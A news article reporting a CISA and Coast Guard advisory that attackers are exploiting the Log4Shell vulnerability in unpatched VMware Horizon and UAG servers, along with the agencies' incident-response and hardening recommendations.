The Cybersecurity and Infrastructure Security Agency (CISA), a United States federal agency, has warned that hackers still pose a significant cybersecurity threat, as threat actors (some of whom are backed by states) are targeting VMware Horizon and Unified Access Gateway (UAG) servers using the Log4Shell remote code execution vulnerability.
First discovered and disclosed in 2021, the Log4Shell bug (CVE-2021-44228) is a vulnerability in the Log4J Java framework that allows commands to be entered into applications via routine log entries. While the flaw has since been patched by most vendors, many applications remain vulnerable without the knowledge of their developers, creating a supply chain threat.
Researchers from Trend Micro Security have also highlighted that members of the LockBit ransomware group have also been connected to data ransom and extortion attempts.
Malicious cyber hackers may exploit Log4Shell remotely on vulnerable servers exposed to local or Internet access, to enable themselves to move laterally across different users’ networks, until the hackers gain access to internal systems which contain sensitive data.
BleepingComputer, referring to a joint advisory released by CISA and the US Coast Guard Cyber Command (CGCYBER), also noted that multiple threat actors, including state-backed hacking groups, have been scanning for and exploiting unpatched systems in December 2021.
Assume Unpatched Systems are Already Compromised
CISA noted that once hackers managed to breach organisations’ networks, they would deploy malware strains providing them with remote access to deploy additional payloads and exfiltrate sensitive information.
“As part of this exploitation, suspected APT actors implanted loader malware on compromised systems, with embedded executables enabling remote command and control (C2). In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data.”
The CISA advised companies with unpatched systems to assume that they were already compromised, and immediately initiate incident response recommendations: immediately isolate potentially-affected systems, collect and review relevant logs and artifacts, hire third-party IR experts, and report the incident to CISA.
“CISA and CGCYBER recommend all organizations with affected systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities using the IOCs provided in this CSA, Malware Analysis Report (MAR)-10382580-1, and MAR-10382254-1.”
In addition, the agencies advised that affected organisations could reduce their attack surface by “hosting essential services on a segregated demilitarized (DMZ) zone, deploying web application firewalls (WAFs), and ensuring strict network perimeter access controls.”
These recent updates on ransomware attacks using the Log4Shell vulnerability follow up from earlier reports of ransomware group Black Basta targeting VMware servers.